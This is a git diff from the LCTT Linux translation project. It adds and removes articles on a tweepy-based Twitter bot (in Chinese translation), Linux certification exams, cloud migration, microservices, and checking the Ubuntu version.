![](https://opensource.com/sites/default/files/uploads/stat.png)
|
||||||
|
|
||||||
### fdisk -l
|
### fdisk -l
|
||||||
|
|
||||||
`fdisk -l` 显示磁盘大小以及磁盘分区信息。
|
`fdisk -l` 显示磁盘大小以及磁盘分区信息。
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/fdisk.png)
|
![](https://opensource.com/sites/default/files/uploads/fdisk.png)
|
||||||
|
|
||||||
这些是用于检查 Linux 文件空间的大多数内置实用程序。有许多类似的工具,如 [Disks][1](GUI 工具),[Ncdu][2] 等,它们也显示磁盘空间的利用率。你有你最喜欢的工具而它不在这个列表上吗?请在评论中分享。
|
这些是用于检查 Linux 文件空间的大多数内置实用程序。有许多类似的工具,如 [Disks][1](GUI 工具),[Ncdu][2] 等,它们也显示磁盘空间的利用率。你有你最喜欢的工具而它不在这个列表上吗?请在评论中分享。
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
via: https://opensource.com/article/18/7/how-check-free-disk-space-linux
|
via: https://opensource.com/article/18/7/how-check-free-disk-space-linux
|
||||||
@ -57,7 +62,7 @@ via: https://opensource.com/article/18/7/how-check-free-disk-space-linux
|
|||||||
作者:[Archit Modi][a]
|
作者:[Archit Modi][a]
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
译者:[MjSeven](https://github.com/MjSeven)
|
译者:[MjSeven](https://github.com/MjSeven)
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
@ -0,0 +1,137 @@
|
|||||||
|
学习如何使用 Python 构建你自己的 Twitter 机器人
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://fedoramagazine.org/wp-content/uploads/2018/07/twitterbot-816x345.jpg)
|
||||||
|
|
||||||
|
Twitter 允许用户将博客帖子和文章[分享][1]给全世界。使用 Python 和 Tweepy 库使得创建一个 Twitter 机器人来接管你的所有的推特变得非常简单。这篇文章告诉你如何去构建这样一个机器人。希望你能将这些概念也同样应用到其他的在线服务的项目中去。
|
||||||
|
|
||||||
|
### 开始
|
||||||
|
|
||||||
|
[tweepy][2] 库可以让创建一个 Twitter 机器人的过程更加容易上手。它包含了 Twitter 的 API 调用和一个很简单的接口。
|
||||||
|
|
||||||
|
下面这些命令使用 `pipenv` 在一个虚拟环境中安装 tweepy。如果你没有安装 `pipenv`,可以看一看我们之前的文章[如何在 Fedora 上安装 Pipenv][3]。
|
||||||
|
|
||||||
|
```
|
||||||
|
$ mkdir twitterbot
|
||||||
|
$ cd twitterbot
|
||||||
|
$ pipenv --three
|
||||||
|
$ pipenv install tweepy
|
||||||
|
$ pipenv shell
|
||||||
|
```
|
||||||
|
|
||||||
|
### Tweepy —— 开始
|
||||||
|
|
||||||
|
要使用 Twitter API ,机器人需要通过 Twitter 的授权。为了解决这个问题, tweepy 使用了 OAuth 授权标准。你可以通过在 <https://apps.twitter.com/> 创建一个新的应用来获取到凭证。
|
||||||
|
|
||||||
|
|
||||||
|
#### 创建一个新的 Twitter 应用
|
||||||
|
|
||||||
|
当你填完了表格并点击了“<ruby>创建你自己的 Twitter 应用<rt>Create your Twitter application</rt></ruby>”的按钮后,你可以获取到该应用的凭证。 Tweepy 需要<ruby>用户密钥<rt>API Key</rt></ruby>和<ruby>用户密码<rt>API Secret</rt></ruby>,这些都可以在 “<ruby>密钥和访问令牌<rt>Keys and Access Tokens</rt></ruby>” 中找到。
|
||||||
|
|
||||||
|
![][4]
|
||||||
|
|
||||||
|
向下滚动页面,使用“<ruby>创建我的访问令牌<rt>Create my access token</rt></ruby>”按钮生成一个“<ruby>访问令牌<rt>Access Token</rt></ruby>” 和一个“<ruby>访问令牌密钥<rt>Access Token Secret</rt></ruby>”。
|
||||||
|
|
||||||
|
#### 使用 Tweppy —— 输出你的时间线
|
||||||
|
|
||||||
|
现在你已经有了所需的凭证了,打开一个文件,并写下如下的 Python 代码。
|
||||||
|
|
||||||
|
```
|
||||||
|
import tweepy
|
||||||
|
auth = tweepy.OAuthHandler("your_consumer_key", "your_consumer_key_secret")
|
||||||
|
auth.set_access_token("your_access_token", "your_access_token_secret")
|
||||||
|
api = tweepy.API(auth)
|
||||||
|
public_tweets = api.home_timeline()
|
||||||
|
for tweet in public_tweets:
|
||||||
|
print(tweet.text)
|
||||||
|
```
|
||||||
|
|
||||||
|
在确保你正在使用你的 Pipenv 虚拟环境后,执行你的程序。
|
||||||
|
|
||||||
|
```
|
||||||
|
$ python tweet.py
|
||||||
|
```
|
||||||
|
|
||||||
|
上述程序调用了 `home_timeline` 方法来获取到你时间线中的 20 条最近的推特。现在这个机器人能够使用 tweepy 来获取到 Twitter 的数据,接下来尝试修改代码来发送 tweet。
|
||||||
|
|
||||||
|
#### 使用 Tweepy —— 发送一条推特
|
||||||
|
|
||||||
|
要发送一条推特 ,有一个容易上手的 API 方法 `update_status` 。它的用法很简单:
|
||||||
|
|
||||||
|
```
|
||||||
|
api.update_status("The awesome text you would like to tweet")
|
||||||
|
```
|
||||||
|
|
||||||
|
Tweepy 拓展为制作 Twitter 机器人准备了非常多不同有用的方法。要获取 API 的详细信息,请查看[文档][5]。
|
||||||
|
|
||||||
|
|
||||||
|
### 一个杂志机器人
|
||||||
|
|
||||||
|
接下来我们来创建一个搜索 Fedora Magazine 的推特并转推这些的机器人。
|
||||||
|
|
||||||
|
为了避免多次转推相同的内容,这个机器人存放了最近一条转推的推特的 ID 。 两个助手函数 `store_last_id` 和 `get_last_id` 将会帮助存储和保存这个 ID。
|
||||||
|
|
||||||
|
然后,机器人使用 tweepy 搜索 API 来查找 Fedora Magazine 的最近的推特并存储这个 ID。
|
||||||
|
|
||||||
|
```
|
||||||
|
import tweepy
|
||||||
|
|
||||||
|
def store_last_id(tweet_id):
|
||||||
|
""" Stores a tweet id in text file """
|
||||||
|
with open('lastid', 'w') as fp:
|
||||||
|
fp.write(str(tweet_id))
|
||||||
|
|
||||||
|
|
||||||
|
def get_last_id():
|
||||||
|
""" Retrieve the list of tweets that were
|
||||||
|
already retweeted """
|
||||||
|
|
||||||
|
with open('lastid') as fp:
|
||||||
|
return fp.read()
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
|
||||||
|
auth = tweepy.OAuthHandler("your_consumer_key", "your_consumer_key_secret")
|
||||||
|
auth.set_access_token("your_access_token", "your_access_token_secret")
|
||||||
|
|
||||||
|
api = tweepy.API(auth)
|
||||||
|
|
||||||
|
try:
|
||||||
|
last_id = get_last_id()
|
||||||
|
except FileNotFoundError:
|
||||||
|
print("No retweet yet")
|
||||||
|
last_id = None
|
||||||
|
|
||||||
|
for tweet in tweepy.Cursor(api.search, q="fedoramagazine.org", since_id=last_id).items():
|
||||||
|
if tweet.user.name == 'Fedora Project':
|
||||||
|
store_last_id(tweet.id)
|
||||||
|
#tweet.retweet()
|
||||||
|
print(f'"{tweet.text}" was retweeted')
|
||||||
|
```
|
||||||
|
|
||||||
|
为了只转推 Fedora Magazine 的推特 ,机器人搜索内容包含 fedoramagazine.org 和由 「Fedora Project」 Twitter 账户发布的推特。
|
||||||
|
|
||||||
|
### 结论
|
||||||
|
|
||||||
|
在这篇文章中你看到了如何使用 tweepy 的 Python 库来创建一个自动阅读、发送和搜索推特的 Twitter 应用。现在,你能使用你自己的创造力来创造一个你自己的 Twitter 机器人。
|
||||||
|
|
||||||
|
这篇文章的演示源码可以在 [Github][6] 找到。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://fedoramagazine.org/learn-build-twitter-bot-python/
|
||||||
|
|
||||||
|
作者:[Clément Verna][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[Bestony](https://github.com/bestony)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://fedoramagazine.org
|
||||||
|
[1]:https://twitter.com
|
||||||
|
[2]:https://tweepy.readthedocs.io/en/v3.5.0/
|
||||||
|
[3]:https://linux.cn/article-9827-1.html
|
||||||
|
[4]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-19-20-17-17.png
|
||||||
|
[5]:http://docs.tweepy.org/en/v3.5.0/api.html#id1
|
||||||
|
[6]:https://github.com/cverna/magabot
|
@ -1,3 +1,4 @@
|
|||||||
|
translating by wyxplus
|
||||||
CIP: Keeping the Lights On with Linux
|
CIP: Keeping the Lights On with Linux
|
||||||
======
|
======
|
||||||
|
|
||||||
|
@ -0,0 +1,64 @@
|
|||||||
|
Open Source Certification: Preparing for the Exam
|
||||||
|
======
|
||||||
|
Open source is the new normal in tech today, with open components and platforms driving mission-critical processes at organizations everywhere. As open source has become more pervasive, it has also profoundly impacted the job market. Across industries [the skills gap is widening, making it ever more difficult to hire people][1] with much needed job skills. That’s why open source training and certification are more important than ever, and this series aims to help you learn more and achieve your own certification goals.
|
||||||
|
|
||||||
|
In the [first article in the series][2], we explored why certification matters so much today. In the [second article][3], we looked at the kinds of certifications that are making a difference. This story will focus on preparing for exams, what to expect during an exam, and how testing for open source certification differs from traditional types of testing.
|
||||||
|
|
||||||
|
Clyde Seepersad, General Manager of Training and Certification at The Linux Foundation, stated, “For many of you, if you take the exam, it may well be the first time that you've taken a performance-based exam and it is quite different from what you might have been used to with multiple choice, where the answer is on screen and you can identify it. In performance-based exams, you get what's called a prompt.”
|
||||||
|
|
||||||
|
As a matter of fact, many Linux-focused certification exams literally prompt test takers at the command line. The idea is to demonstrate skills in real time in a live environment, and the best preparation for this kind of exam is practice, backed by training.
|
||||||
|
|
||||||
|
### Know the requirements
|
||||||
|
|
||||||
|
"Get some training," Seepersad emphasized. "Get some help to make sure that you're going to do well. We sometimes find folks have very deep skills in certain areas, but then they're light in other areas. If you go to the website for [Linux Foundation training and certification][4], for the [LFCS][5] and the [LFCE][6] certifications, you can scroll down the page and see the details of the domains and tasks, which represent the knowledge areas you're supposed to know.”
|
||||||
|
|
||||||
|
Once you’ve identified the skills you need, “really spend some time on those and try to identify whether you think there are areas where you have gaps. You can figure out what the right training or practice regimen is going to be to help you get prepared to take the exam," Seepersad said.
|
||||||
|
|
||||||
|
### Practice, practice, practice
|
||||||
|
|
||||||
|
"Practice is important, of course, for all exams," he added. "We deliver the exams in a bit of a unique way -- through your browser. We're using a terminal emulator on your browser and you're being proctored, so there's a live human who is watching you via video cam, your screen is being recorded, and you're having to work through the exam console using the browser window. You're going to be asked to do something live on the system, and then at the end, we're going to evaluate that system to see if you were successful in accomplishing the task"
|
||||||
|
|
||||||
|
What if you run out of time on your exam, or simply don’t pass because you couldn’t perform the required skills? “I like the phrase, exam insurance,” Seepersad said. “The way we take the stress out is by offering a ‘no questions asked’ retake. If you take either exam, LFCS, LFCE and you do not pass on your first attempt, you are automatically eligible to have a free second attempt.”
|
||||||
|
|
||||||
|
The Linux Foundation intentionally maintains separation between its training and certification programs and uses an independent proctoring solution to monitor candidates. It also requires that all certifications be renewed every two years, which gives potential employers confidence that skills are current and have been recently demonstrated.
|
||||||
|
|
||||||
|
### Free certification guide
|
||||||
|
|
||||||
|
Becoming a Linux Foundation Certified System Administrator or Engineer is no small feat, so the Foundation has created [this free certification guide][7] to help you with your preparation. In this guide, you’ll find:
|
||||||
|
|
||||||
|
* Critical things to keep in mind on test day
|
||||||
|
|
||||||
|
|
||||||
|
* An array of both free and paid study resources to help you be as prepared as possible
|
||||||
|
|
||||||
|
* A few tips and tricks that could make the difference at exam time
|
||||||
|
|
||||||
|
* A checklist of all the domains and competencies covered in the exam
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
With certification playing a more important role in securing a rewarding long-term career, careful planning and preparation are key. Stay tuned for the next article in this series that will answer frequently asked questions pertaining to open source certification and training.
|
||||||
|
|
||||||
|
[Learn more about Linux training and certification.][8]
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.linux.com/blog/sysadmin-cert/2018/7/open-source-certification-preparing-exam
|
||||||
|
|
||||||
|
作者:[Sam Dean][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.linux.com/users/sam-dean
|
||||||
|
[1]:https://www.linux.com/blog/os-jobs-report/2017/9/demand-open-source-skills-rise
|
||||||
|
[2]:https://www.linux.com/blog/sysadmin-cert/2018/7/5-reasons-open-source-certification-matters-more-ever
|
||||||
|
[3]:https://www.linux.com/blog/sysadmin-cert/2018/7/tips-success-open-source-certification
|
||||||
|
[4]:https://training.linuxfoundation.org/
|
||||||
|
[5]:https://training.linuxfoundation.org/certification/linux-foundation-certified-sysadmin-lfcs/
|
||||||
|
[6]:https://training.linuxfoundation.org/certification/linux-foundation-certified-engineer-lfce/
|
||||||
|
[7]:https://training.linuxfoundation.org/download-free-certification-prep-guide
|
||||||
|
[8]:https://training.linuxfoundation.org/certification/
|
@ -0,0 +1,71 @@
|
|||||||
|
Why moving all your workloads to the cloud is a bad idea
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/cloud-globe.png?itok=_drXt4Tn)
|
||||||
|
|
||||||
|
As we've been exploring in this series, cloud hype is everywhere, telling you that migrating your applications to the cloud—including hybrid cloud and multicloud—is the way to ensure a digital future for your business. This hype rarely dives into the pitfalls of moving to the cloud, nor considers the daily work of enhancing your customer's experience and agile delivery of new and legacy applications.
|
||||||
|
|
||||||
|
In [part one][1] of this series, we covered basic definitions (to level the playing field). We outlined our views on hybrid cloud and multi-cloud, making sure to show the dividing lines between the two. This set the stage for [part two][2], where we discussed the first of three pitfalls: Why cost is not always the obvious motivator for moving to the cloud.
|
||||||
|
|
||||||
|
In part three, we'll look at the second pitfall: Why moving all your workloads to the cloud is a bad idea.
|
||||||
|
|
||||||
|
### Everything's better in the cloud?
|
||||||
|
|
||||||
|
There's a misconception that everything will benefit from running in the cloud. All workloads are not equal, and not all workloads will see a measurable effect on the bottom line from moving to the cloud.
|
||||||
|
|
||||||
|
As [InformationWeek wrote][3], "Not all business applications should migrate to the cloud, and enterprises must determine which apps are best suited to a cloud environment." This is a hard fact that the utility company in part two of this series learned when labor costs rose while trying to move applications to the cloud. Discovering this was not a viable solution, the utility company backed up and reevaluated its applications. It found some applications were not heavily used and others had data ownership and compliance issues. Some of its applications were not certified for use in a cloud environment.
|
||||||
|
|
||||||
|
Sometimes running applications in the cloud is not physically possible, but other times it's not financially viable to run in the cloud.
|
||||||
|
|
||||||
|
Imagine a fictional online travel company. As its business grew, it expanded its on-premises hosting capacity to over 40,000 servers. It eventually became a question of expanding resources by purchasing a data center at a time, not a rack at a time. Its business consumes bandwidth at such volumes that cloud pricing models based on bandwidth usage remain prohibitive.
|
||||||
|
|
||||||
|
### Get a baseline
|
||||||
|
|
||||||
|
Sometimes running applications in the cloud is not physically possible, but other times it's not financially viable to run in the cloud.
|
||||||
|
|
||||||
|
As these examples show, nothing is more important than having a thorough understanding of your application landscape. Along with a having good understanding of what applications need to migrate to the cloud, you also need to understand current IT environments, know your present level of resources, and estimate your costs for moving.
|
||||||
|
|
||||||
|
As these examples show, nothing is more important than having a thorough understanding of your application landscape. Along with a having good understanding of what applications need to migrate to the cloud, you also need to understand current IT environments, know your present level of resources, and estimate your costs for moving.
|
||||||
|
|
||||||
|
Understanding your baseline–each application's current situation and performance requirements (network, storage, CPU, memory, application and infrastructure behavior under load, etc.)–gives you the tools to make the right decision.
|
||||||
|
|
||||||
|
If you're running servers with single-digit CPU utilization due to complex acquisition processes, a cloud with on-demand resourcing might be a great idea. However, first ask these questions:
|
||||||
|
|
||||||
|
* How long did this low-utilization exist?
|
||||||
|
* Why wasn't it caught earlier?
|
||||||
|
* Isn't there a process or effective monitoring in place?
|
||||||
|
* Do you really need a cloud to fix this? Or just a better process for both getting and managing your resources?
|
||||||
|
* Will you have a better process in the cloud?
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
### Are containers necessary?
|
||||||
|
|
||||||
|
Many believe you need containers to be successful in the cloud. This popular [catchphrase][4] sums it up nicely, "We crammed this monolith into a container and called it a microservice."
|
||||||
|
|
||||||
|
Containers are a means to an end, and using containers doesn't mean your organization is capable of running maturely in the cloud. It's not about the technology involved, it's about applications that often were written in days gone by with technology that's now outdated. If you put a tire fire into a container and then put that container on a container platform to ship, it's still functionality that someone is using.
|
||||||
|
|
||||||
|
Is that fire easier to extinguish now? These container fires just create more challenges for your DevOps teams, who are already struggling to keep up with all the changes being pushed through an organization moving everything into the cloud.
|
||||||
|
|
||||||
|
Note, it's not necessarily a bad decision to move legacy workloads into the cloud, nor is it a bad idea to containerize them. It's about weighing the benefits and the downsides, assessing the options available, and making the right choices for each of your workloads.
|
||||||
|
|
||||||
|
### Coming up
|
||||||
|
|
||||||
|
In part four of this series, we'll describe the third and final pitfall everyone should avoid with hybrid multi-cloud. Find out what the cloud means for your data.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/why-you-cant-move-everything-cloud
|
||||||
|
|
||||||
|
作者:[Eric D.Schabell][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/eschabell
|
||||||
|
[1]:https://opensource.com/article/18/4/pitfalls-hybrid-multi-cloud
|
||||||
|
[2]:https://opensource.com/article/18/6/reasons-move-to-cloud
|
||||||
|
[3]:https://www.informationweek.com/cloud/10-cloud-migration-mistakes-to-avoid/d/d-id/1318829
|
||||||
|
[4]:https://speakerdeck.com/caseywest/containercon-north-america-cloud-anti-patterns?slide=22
|
@ -1,3 +1,5 @@
|
|||||||
|
translating by bestony
|
||||||
|
|
||||||
How to use Fio (Flexible I/O Tester) to Measure Disk Performance in Linux
|
How to use Fio (Flexible I/O Tester) to Measure Disk Performance in Linux
|
||||||
======
|
======
|
||||||
![](https://wpmojo.com/wp-content/uploads/2017/08/wpmojo.com-how-to-use-fio-to-measure-disk-performance-in-linux-dotlayer.com-how-to-use-fio-to-measure-disk-performance-in-linux-816x457.jpeg)
|
![](https://wpmojo.com/wp-content/uploads/2017/08/wpmojo.com-how-to-use-fio-to-measure-disk-performance-in-linux-dotlayer.com-how-to-use-fio-to-measure-disk-performance-in-linux-816x457.jpeg)
|
||||||
|
@ -1,3 +1,4 @@
|
|||||||
|
Translating by qhwdw
|
||||||
# Understanding metrics and monitoring with Python
|
# Understanding metrics and monitoring with Python
|
||||||
|
|
||||||
![Understanding metrics and monitoring with Python](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/metrics_graph_stats_blue.png?itok=OKCc_60D "Understanding metrics and monitoring with Python")
|
![Understanding metrics and monitoring with Python](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/metrics_graph_stats_blue.png?itok=OKCc_60D "Understanding metrics and monitoring with Python")
|
||||||
|
@ -1,58 +0,0 @@
|
|||||||
Everything old is new again: Microservices – DXC Blogs
|
|
||||||
======
|
|
||||||
![](https://csccommunity.files.wordpress.com/2018/05/old-building-with-modern-addition.jpg?w=610)
|
|
||||||
|
|
||||||
If I told you about a software architecture in which components of an application provided services to other components via a communications protocol over a network you would say it was…
|
|
||||||
|
|
||||||
Well, it depends. If you got your start programming in the 90s, you’d say I just defined a [Service-Oriented Architecture (SOA)][1]. But, if you’re younger and cut your developer teeth on the cloud, you’d say: “Oh, you’re talking about [microservices][2].”
|
|
||||||
|
|
||||||
You’d both be right. To really understand the differences, you need to dive deeper into these architectures.
|
|
||||||
|
|
||||||
In SOA, a service is a function, which is well-defined, self-contained, and doesn’t depend on the context or state of other services. There are two kinds of services. A service consumer, which requests a service from the other type, a service provider. An SOA service can play both roles.
|
|
||||||
|
|
||||||
SOA services can trade data with each other. Two or more services can also coordinate with each other. These services carry out basic jobs such as creating a user account, providing login functionality, or validating a payment.
|
|
||||||
|
|
||||||
SOA isn’t so much about modularizing an application as it is about composing an application by integrating distributed, separately-maintained and deployed components. These components run on servers.
|
|
||||||
|
|
||||||
Early versions of SOA used object-oriented protocols to communicate with each other. For example, Microsoft’s [Distributed Component Object Model (DCOM)][3] and [Object Request Brokers (ORBs)][4] use the [Common Object Request Broker Architecture (CORBA)][5] specification.
|
|
||||||
|
|
||||||
Later versions used messaging services such as [Java Message Service (JMS)][6] or [Advanced Message Queuing Protocol (AMQP)][7]. These service connections are called Enterprise Service Buses (ESB). Over these buses, data, almost always in eXtensible Markup Language (XML) format, is transmitted and received.
|
|
||||||
|
|
||||||
[Microservices][2] is an architectural style where applications are made up from loosely coupled services or modules. It lends itself to the Continuous Integration/Continuous Deployment (CI/CD) model of developing large, complex applications. An application is the sum of its modules.
|
|
||||||
|
|
||||||
Each microservice provides an application programming interface (API) endpoint. These are connected by lightweight protocols such as [REpresentational State Transfer (REST)][8], or [gRPC][9]. Data tends to be represented by [JavaScript Object Notation (JSON)][10] or [Protobuf][11].
|
|
||||||
|
|
||||||
Both architectures stand as an alternative to the older, monolithic style of architecture where applications are built as single, autonomous units. For example, in a client-server model, a typical Linux, Apache, MySQL, PHP/Python/Perl (LAMP) server-side application would deal with HTTP requests, run sub-programs and retrieves/updates from the underlying MySQL database. These are all tied closely together. When you change anything, you must build and deploy a new version.
|
|
||||||
|
|
||||||
With SOA, you may need to change several components, but never the entire application. With microservices, though, you can make changes one service at a time. With microservices, you’re working with a true decoupled architecture.
|
|
||||||
|
|
||||||
Microservices are also lighter than SOA. While SOA services are deployed to servers and virtual machines (VMs), microservices are deployed in containers. The protocols are also lighter. This makes microservices more flexible than SOA. Hence, it works better with Agile shops.
|
|
||||||
|
|
||||||
So what does this mean? The long and short of it is that microservices are an SOA variation for container and cloud computing.
|
|
||||||
|
|
||||||
Old style SOA isn’t going away, but as we continue to move applications to containers, the microservice architecture will only grow more popular.
|
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://blogs.dxc.technology/2018/05/08/everything-old-is-new-again-microservices/
|
|
||||||
|
|
||||||
作者:[Cloudy Weather][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://blogs.dxc.technology/author/steven-vaughan-nichols/
|
|
||||||
[1]:https://www.service-architecture.com/articles/web-services/service-oriented_architecture_soa_definition.html
|
|
||||||
[2]:http://microservices.io/
|
|
||||||
[3]:https://technet.microsoft.com/en-us/library/cc958799.aspx
|
|
||||||
[4]:https://searchmicroservices.techtarget.com/definition/Object-Request-Broker-ORB
|
|
||||||
[5]:http://www.corba.org/
|
|
||||||
[6]:https://docs.oracle.com/javaee/6/tutorial/doc/bncdq.html
|
|
||||||
[7]:https://www.amqp.org/
|
|
||||||
[8]:https://www.service-architecture.com/articles/web-services/representational_state_transfer_rest.html
|
|
||||||
[9]:https://grpc.io/
|
|
||||||
[10]:https://www.json.org/
|
|
||||||
[11]:https://github.com/google/protobuf/
|
|
@ -1,127 +0,0 @@
|
|||||||
How To Check Ubuntu Version and Other System Information Easily
|
|
||||||
======
|
|
||||||
**Brief: Wondering which Ubuntu version are you using? Here’s how to check Ubuntu version, desktop environment and other relevant system information.**
|
|
||||||
|
|
||||||
You can easily find the Ubuntu version you are using in the command line or via the graphical interface. Knowing the exact Ubuntu version, desktop environment and other system information helps a lot when you are trying to follow a tutorial from the web or seeking help in various forums.
|
|
||||||
|
|
||||||
In this quick tip, I’ll show you various ways to check [Ubuntu][1] version and other common system information.
|
|
||||||
|
|
||||||
### How to check Ubuntu version in terminal
|
|
||||||
|
|
||||||
This is the best way to find Ubuntu version. I could have mentioned the graphical way first but then I chose this method because this one doesn’t depend on the [desktop environment][2] you are using. You can use it on any Ubuntu variant.
|
|
||||||
|
|
||||||
Open a terminal (Ctrl+Alt+T) and type the following command:
|
|
||||||
```
|
|
||||||
lsb_release -a
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
The output of the above command should be like this:
|
|
||||||
```
|
|
||||||
No LSB modules are available.
|
|
||||||
Distributor ID: Ubuntu
|
|
||||||
Description: Ubuntu 16.04.4 LTS
|
|
||||||
Release: 16.04
|
|
||||||
Codename: xenial
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
![How to check Ubuntu version in command line][3]
|
|
||||||
|
|
||||||
As you can see, the current Ubuntu installed in my system is Ubuntu 16.04 and its code name is Xenial.
|
|
||||||
|
|
||||||
Wait! Why does it say Ubuntu 16.04.4 in Description and 16.04 in the Release? Which one is it, 16.04 or 16.04.4? What’s the difference between the two?
|
|
||||||
|
|
||||||
The short answer is that you are using Ubuntu 16.04. That’s the base image. 16.04.4 signifies the fourth point release of 16.04. A point release can be thought of as a service pack in Windows era. Both 16.04 and 16.04.4 will be the correct answer here.
|
|
||||||
|
|
||||||
What’s Xenial in the output? That’s the codename of the Ubuntu 16.04 release. You can read this [article to know about Ubuntu naming convention][4].
|
|
||||||
|
|
||||||
#### Some alternate ways to find Ubuntu version
|
|
||||||
|
|
||||||
Alternatively, you can use either of the following commands to find Ubuntu version:
|
|
||||||
```
|
|
||||||
cat /etc/lsb-release
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
The output of the above command would look like this:
|
|
||||||
```
|
|
||||||
DISTRIB_ID=Ubuntu
|
|
||||||
DISTRIB_RELEASE=16.04
|
|
||||||
DISTRIB_CODENAME=xenial
|
|
||||||
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
![How to check Ubuntu version in command line][5]
|
|
||||||
|
|
||||||
You can also use this command to know Ubuntu version
|
|
||||||
```
|
|
||||||
cat /etc/issue
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
The output of this command will be like this:
|
|
||||||
```
|
|
||||||
Ubuntu 16.04.4 LTS \n \l
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Forget the \n \l. The Ubuntu version is 16.04.4 in this case or simply Ubuntu 16.04.
|
|
||||||
|
|
||||||
### How to check Ubuntu version graphically
|
|
||||||
|
|
||||||
Checking Ubuntu version graphically is no big deal either. I am going to use screenshots from Ubuntu 18.04 GNOME here. Things may look different if you are using Unity or some other desktop environment. This is why I recommend the command line version discussed in the previous sections because that doesn’t depend on the desktop environment.
|
|
||||||
|
|
||||||
I’ll show you how to find the desktop environment in the next section.
|
|
||||||
|
|
||||||
For now, go to System Settings and look under the Details segment.
|
|
||||||
|
|
||||||
![Finding Ubuntu version graphically][6]
|
|
||||||
|
|
||||||
You should see the Ubuntu version here along with the information about the desktop environment you are using, [GNOME][7] being the case here.
|
|
||||||
|
|
||||||
![Finding Ubuntu version graphically][8]
|
|
||||||
|
|
||||||
### How to know the desktop environment and other system information in Ubuntu
|
|
||||||
|
|
||||||
So you just learned how to find Ubuntu version. What about the desktop environment in use? Which Linux kernel version is being used?
|
|
||||||
|
|
||||||
Of course, there are various commands you can use to get all those information but I’ll recommend a command line utility called [Neofetch][9]. This will show you essential system information in the terminal beautifully with the logo of Ubuntu or any other Linux distribution you are using.
|
|
||||||
|
|
||||||
Install Neofetch using the command below:
|
|
||||||
```
|
|
||||||
sudo apt install neofetch
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Once installed, simply run the command `neofetch` in the terminal and see a beautiful display of system information.
|
|
||||||
|
|
||||||
![System information in Linux terminal][10]
|
|
||||||
|
|
||||||
As you can see, Neofetch shows you the Linux kernel version, Ubuntu version, desktop environment in use along with its version, themes and icons in use etc.
|
|
||||||
|
|
||||||
I hope it helps you to find Ubuntu version and other system information. If you have suggestions to improve this article, feel free to drop it in the comment section. Ciao :)
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://itsfoss.com/how-to-know-ubuntu-unity-version/
|
|
||||||
|
|
||||||
作者:[Abhishek Prakash][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]: https://itsfoss.com/author/abhishek/
|
|
||||||
[1]:https://www.ubuntu.com/
|
|
||||||
